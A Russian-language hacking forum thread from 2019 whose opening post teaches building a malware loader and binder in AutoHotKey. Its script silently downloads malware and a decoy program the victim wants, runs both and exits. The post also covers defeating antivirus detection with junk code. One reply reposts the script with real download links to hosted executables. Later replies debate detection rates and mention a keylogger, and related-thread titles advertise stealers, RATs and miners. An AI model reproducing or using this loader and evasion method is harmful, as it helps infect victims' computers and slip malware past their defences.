Авторская статья Делаем склеивание и лоадер своими руками! 0 вложений!

ОхранникОффтопа · 4 май 2019

Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

Почему это лучше покупных лоадеров?
А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
А также нет зависимостей и не нужны права администратора.

Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали!

Для начала, где будем писать?
Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

С чего начнём?
Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
#NoTrayIcon

Код
#NoTrayIcon
Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Код
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe
Первый файл - пусть будет условно наш ******.
Второй файл - софт, который просто нужен жертве.

Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

Код
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe

    {

        IfExist, %A_Temp%\keymaker.exe

        {

            Run, %A_Temp%\keymaker.exe

            Run, %A_Temp%\st.exe

            Sleep, 1000

            ExitApp

        }

    }

}
IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

Как чистить детекты?
Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

A:= 228
B:= A
C:= "fqfqfvwg"
B:= C
A:= 25868

Код
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe



Loop

{

   IfExist, %A_Temp%\st.exe

   {

       IfExist, %A_Temp%\keymaker.exe

       {

           Run, %A_Temp%\keymaker.exe

           Run, %A_Temp%\st.exe

           Sleep, 1000

           ExitApp

       }

   }

}









A:= 228

B:= A

C:= "fqfqfvwg"

B:= C

A:= 25868
После этого, детект чистится.

После написания компилируем в exe и радуемся.
Вес билда ~ 700 кб.

После компиляции у софта будет такая иконка:

Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
Переходим по пути: Ваш путь\AutoHotkey\Compiler
Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.

Также добавлю из своих наблюдений касательно детектов:
Начальный детект - 2/70
Спустя 2-3 дня детект - не более 6/70
При этом начальный детект составляет 2 нонейм АВ, а в конечном там максимум окажется Kaspersky.
И это всё учитывая то, что я намеренно сливал на VirusTotal для проверки данной информации.
Так что у Вас может быть всё куда круче!

Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
Всем спасибо

ayan2030 · 4 май 2019

sharaskidaem а что если наш мальварь с детектами?

Tawer1337 · 4 май 2019

ayan2030, сделать крипт для малваря, не?

ОхранникОффтопа · 5 май 2019

Народ жду вашего мнения)

NikitaJoy1992 · 5 май 2019

Очень хорошая тема !

Cal_inactive496112 · 5 май 2019

ОхранникОффтопа Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

Почему это лучше покупных лоадеров?
А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
А также нет зависимостей и не нужны права администратора.

Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали!

Для начала, где будем писать?
Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

С чего начнём?
Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
#NoTrayIcon

Код
#NoTrayIcon
Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Код
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe
Первый файл - пусть будет условно наш ******.
Второй файл - софт, который просто нужен жертве.

Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

Код
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe

    {

        IfExist, %A_Temp%\keymaker.exe

        {

            Run, %A_Temp%\keymaker.exe

            Run, %A_Temp%\st.exe

            Sleep, 1000

            ExitApp

        }

    }

}
IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

Как чистить детекты?
Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe and %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}

A:= 228
B:= A
C:= "fqfqfvwg"
B:= C
A:= 25868

Код
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe and %A_Temp%\keymaker.exe

    {

        Run, %A_Temp%\keymaker.exe

        Run, %A_Temp%\st.exe

        Sleep, 1000

        ExitApp

    }

}









A:= 228

B:= A

C:= "fqfqfvwg"

B:= C

A:= 25868
После этого, детект чистится.

После написания компилируем в exe и радуемся

После компиляции у софта будет такая иконка:

Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
Переходим по пути: Ваш путь\AutoHotkey\Compiler
Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.

Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
Всем спасибо
Нажмите, чтобы раскрыть...
Чистим детекты добавлением мусорного кода, пизда

PashaPlay · 5 май 2019

+ Годная тема !

ОхранникОффтопа · 5 май 2019

Cal_inactive496112 Чистим детекты добавлением мусорного кода, пизда
Нажмите, чтобы раскрыть...

Я всегда проверяю то, что публикую.
Детект на минимале держится несколько дней, это работает, хотя и звучит не очень
Плюс к этому добавить стоит что ЯП этот не юзался вообще для мальваря, так что для антивирусов это что-то новое

whom · 6 май 2019

Cal_inactive496112, У меня нанём кейлоггер написан)))

whom · 6 май 2019

Cal_inactive496112, Не веришь чишо?

TomRedl · 6 май 2019

Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"

ОхранникОффтопа · 7 май 2019

TomRedl Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"
Нажмите, чтобы раскрыть...

Уже неделю детекты не повышаются на ******е, каждые 2-3 дня лоадеру чищу и всё

TomRedl · 7 май 2019

ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь

ОхранникОффтопа · 7 май 2019

TomRedl ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь
Нажмите, чтобы раскрыть...

Да я и до того как эту херь придумал юзал его, естественно лежит.
Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.

Енот272_inactive171964 · 7 май 2019

URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен

Енот272_inactive171964 · 7 май 2019

ОхранникОффтопа Да я и до того как эту херь придумал юзал его, естественно лежит.
Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.
Нажмите, чтобы раскрыть...

>> лоадер специально на ВТ заливал
КАК ЖЕ ВЕСЕЛО БЛЯД

ОхранникОффтопа · 7 май 2019

Енот272_inactive171964 URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен
Нажмите, чтобы раскрыть...

Дефендер не ругается на него, проверь, потом уже говори)
Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. И то за пару дней только детектов 3-5 набежит, и всё. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко

Енот272_inactive171964 · 7 май 2019

ОхранникОффтопа Дефендер не ругается на него, проверь, потом уже говори)
Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко
Нажмите, чтобы раскрыть...

мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.

ОхранникОффтопа · 10 май 2019

Енот272_inactive171964 мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.
Нажмите, чтобы раскрыть...

Полтора года не научили тебя проверять то, о чём говоришь. Я проливал уже на этот лоадер, абсолютно всем похуй на него, поверь. Просто возьми и сам это сделай, если тебе так не верится, что дефендеру на него абсолютно плевать, а антивирусы без детектов и подавно хуй клали на него

hakzcode · 21 май 2019

Годно, так и хочется симпу въебать, но не могу ._.

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий *** с отправкой * в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

Авторская статья Делаем склеивание и лоадер своими руками! 0 вложений!

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий ******* с отправкой ***** в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

Авторская статья Делаем склеивание и лоадер своими руками! 0 вложений!

Как сделать рабочий *** с отправкой * в дискорд.